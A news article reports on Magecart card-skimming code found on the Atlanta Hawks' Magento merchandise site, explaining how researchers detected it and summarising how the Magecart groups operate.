The Atlanta Hawks basketball team is recovering after hackers planted credit card skimming code on its ecommerce site.
Researchers at Sanguine Security found the exploit on the NBA basketball team’s ecommerce site. Anyone ordering merchandise on or after 20 April 2019 had their name, address, and credit card details stolen by the malicious code, which logs victims’ keystrokes at the point of entry.
The researchers built a Magecart detection tool which scans websites for telltale code. It found obfuscated JavaScript code on the Hawks website. The team rendered it into a readable format and found instructions to log visitors’ keystrokes. Then, they checked its operation using Chrome Developer Tools, which is the developer console in the Chrome browser that shows website traffic. Alongside the regular requests you’d expect to see targeting the Hawks website, it also sent the logged keystrokes to imagesengines.com.
The researchers believe that the hackers may have gained access via a third-party component running on the Hawks ecommerce site, which uses the Adobe-owned Magento Commerce Cloud e-commerce system. It said:
Our previous research has uncovered a range of popular vectors: database management tools, marketing plugins and connected accounting software are in the top-3.
Magecart isn’t a regular hacking group; it’s a group of groups that specializes in skimming payment information from ecommerce sites. There are at least seven, according to an investigation of the group from security company RiskIQ. They all have one thing in common, though: they prey on organizations using Magento. In the past, they have attacked companies including Ticketmaster, British Airways, and online retailer Newegg.
RiskIQ says it spotted the first group in 2015, and the activities evolved from there. Some groups use the same infrastructure, but their modus operandi differs. Some of them use automated spray-and-pray attack tools to breach sites, while others are more selective, targeting large brands for big payoffs.
Some groups monetize stolen credit card data by purchasing goods fraudulently and shipping them to mules in the US. The mules, often recruited via work-from-home job scams, forward them to Eastern Europe where the cybercriminals sell them on.
The Hawks reportedly disabled all payment and checkout capabilities on hawkshop.com to prevent any further skimming, adding:
At this stage of the investigation, we believe that less than a handful of purchases on Hawksshop.com were affected.